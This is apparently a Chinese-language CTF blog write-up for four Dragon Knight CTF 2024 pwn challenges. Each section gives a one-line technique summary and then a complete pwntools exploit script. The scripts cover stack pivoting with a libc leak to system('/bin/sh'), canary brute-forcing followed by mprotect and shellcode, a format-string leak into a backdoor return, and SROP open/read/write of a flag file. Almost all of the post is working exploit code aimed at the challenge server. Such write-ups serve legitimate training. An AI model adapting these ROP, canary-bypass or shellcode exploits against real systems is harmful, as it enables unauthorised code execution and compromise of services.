0%

Dragon Knight CTF 2024 pwn wp

Dragon Knight CTF 2024 pwn wp

stack

非常经典的栈迁移例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
context.arch = 'amd64'
#context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-e']
local_file = '/home/feichai/ctf_file/pwn'
elf=ELF(local_file)
local_libc = '/home/feichai/ctf_file/libc-2.31.so'
libc=ELF(local_libc, checksec = False)

def start():
if args.GDB:
gdbscript = '''
'''
io = process(local_file)
gdb.attach(io, gdbscript)
elif args.PROCESS:
io = process(local_file)
else:
io = remote("challenge.qsnctf.com", 31728)

return io

def lg(s, addr):
return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')

r = lambda a: io.recv(a)
ru = lambda a: io.recvuntil(a)
s = lambda a: io.send(a)
sa = lambda a,b: io.sendafter(a,b)
sl = lambda a: io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)

io = start()

def exp():

puts_plt=elf.plt.puts
puts_got=elf.got.puts

pop_rdi = 0x0000000000401210
leave_ret = 0x00000000004011be
bss = 0x404040 + 0x500
pop_rbp = 0x000000000040115d

pd = b'a'*0x100+p64(bss+0x100)+p64(0x40118F)
sa(b'pivoting?',pd)

pd=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)
pd+=p64(pop_rbp)+p64(bss+0x500)+p64(0x40118F)
pd=pd.ljust(0x100,b"\x00")+p64(bss-0x8)+p64(leave_ret)
sa(b'pivoting?',pd)

leak_libc = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak_libc-libc.symbols[b'puts']
libc_system = libc_base + libc.symbols[b'system']
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))

pd=p64(pop_rdi)+p64(bin_sh_addr)+p64(libc_system)
pd=pd.ljust(0x100,b"\x00")+p64(bss+0x500-0x100-0x8)+p64(leave_ret)

sa(b'pivoting?',pd)


io.interactive()

if __name__=='__main__':
exp()

canary

爆破canary然后用mprotect提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
context.arch = 'amd64'
#context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-e']
local_file = '/home/feichai/ctf_file/pwn'
elf=ELF(local_file)

def start():
if args.GDB:
gdbscript = '''
'''
io = process(local_file)
gdb.attach(io, gdbscript)
elif args.PROCESS:
io = process(local_file)
else:
io = remote("challenge.qsnctf.com",30537)

return io

def lg(s, addr):
return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')

r = lambda a: io.recv(a)
ru = lambda a: io.recvuntil(a)
s = lambda a: io.send(a)
sa = lambda a,b: io.sendafter(a,b)
sl = lambda a: io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)

io = start()

def exp():

ru(b'input:\n')
canary = b'\x00'
for k in range(7):
for i in range(256):
#sleep(0.1)
s(b'a'*0x108 + canary + p8(i))
aa = ru(b'\n')
print(i)
if b'smashing' in aa:
ru(b'\n')
else:
canary += p8(i)
print(b"canary: " + canary)
break

pop_rdi = 0x00000000004018c2
pop_rsi = 0x000000000040f23e
pop_rdx = 0x00000000004017cf

pd = b'a'*0x108 + canary + b'A'*8

got_plt = 0x4c1000
call_mprotect = 0x449774
call_read = 0x448920

pd += p64(pop_rdi) + p64(got_plt)
pd += p64(pop_rsi) + p64(0x1000)
pd += p64(pop_rdx) + p64(7)
pd += p64(call_mprotect)

pd += p64(pop_rdi) + p64(0)
pd += p64(pop_rsi) + p64(got_plt)
pd += p64(pop_rdx) + p64(0xff)
pd += p64(call_read) + p64(got_plt)

s(pd)
sleep(0.1)
sc = asm(shellcraft.sh())
s(sc)


io.interactive()

if __name__=='__main__':
exp()

ez_quiz

解密不太会,用gpt写的,然后就是eval计算,fmt泄露基址,溢出返回backdoor

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
context.arch = 'amd64'
#context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-e']
local_file = '/home/feichai/ctf_file/ez_quiz'
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def start():
if args.GDB:
gdbscript = '''
b *$rebase(0x1E71)
'''
io = process(local_file)
gdb.attach(io, gdbscript)
elif args.PROCESS:
io = process(local_file)
else:
io = remote("challenge.qsnctf.com", 30162)

return io

def lg(s, addr):
return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')

r = lambda a: io.recv(a)
ru = lambda a: io.recvuntil(a,drop=True)
s = lambda a: io.send(a)
sa = lambda a,b: io.sendafter(a,b)
sl = lambda a: io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)

io = start()

def exp():
sla("Please give me your token:",'DRKCTF{P13@s3_1e@k_thE_addr_0f_7he_cAnARy_@nd_pie}')
ru('Right!')
ans = eval(ru('='))
sla('?',str(ans))

sla('gift:\n','%13$p%11$p') # 6
leak_pie = int(r(14),16)
canary = int(r(18),16)
lg('leak_pie',leak_pie)
lg('canary',canary)

pie_base = leak_pie - 0x2042
backdoor = pie_base + 0x1426
pd = b'a'*(0x30-8)+p64(canary)+p64(1)+p64(backdoor)
sl(pd)


io.interactive()

if __name__=='__main__':
exp()

srop_seccomp

题目即考点,基础题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
context.arch = 'amd64'
#context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-e']
local_file = '/home/feichai/ctf_file/chall'
elf=ELF(local_file)

def start():
if args.GDB:
gdbscript = '''
'''
io = process(local_file)
gdb.attach(io, gdbscript)
elif args.PROCESS:
io = process(local_file)
else:
io = remote("challenge.qsnctf.com", 30374)

return io

def lg(s, addr):
return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')

r = lambda a: io.recv(a)
ru = lambda a: io.recvuntil(a)
s = lambda a: io.send(a)
sa = lambda a,b: io.sendafter(a,b)
sl = lambda a: io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)

io = start()

def exp():

bss = 0x404060
mov_rax_0xf = 0x0000000000401193
syscall = 0x000000000040118a
flag_addr = bss+0x400
leave_ret = 0x000000000040136c
ret = 0x0000000000401016

sigopen = SigreturnFrame()
sigopen.rax = 2
sigopen.rdi = flag_addr
sigopen.rsi = 0
sigopen.rdx = 0
sigopen.rsp = bss+0x108
sigopen.rbp = bss+0x108
sigopen.rip = syscall

sigread = SigreturnFrame()
sigread.rax = 0
sigread.rdi = 3
sigread.rsi = bss + 0x700
sigread.rdx = 0x100
sigread.rsp = bss+0x218
sigread.rbp = bss+0x218
sigread.rip = syscall

sigwrite = SigreturnFrame()
sigwrite.rax = 1
sigwrite.rdi = 1
sigwrite.rsi = bss + 0x700
sigwrite.rdx = 0x100
#sigwrite.rsp = bss+0x320
#sigwrite.rbp = bss+0x320
sigwrite.rip = syscall

pd = p64(mov_rax_0xf)+p64(syscall)
pd += bytes(sigopen)

pd += p64(0x1)+p64(mov_rax_0xf)+p64(syscall)
pd += bytes(sigread)

pd += p64(0x1)+p64(mov_rax_0xf)+p64(syscall)
pd += bytes(sigwrite)

pd = pd.ljust(0x400,b'\x00')+b'flag\x00'

sa(b'easyhack',pd)

pd = b'a'*0x2a+p64(bss-8) + p64(leave_ret)
sa(b'SUID?\n',pd)

io.interactive()

if __name__=='__main__':
exp()
-------------本文结束感谢您的阅读-------------

欢迎关注我的其它发布渠道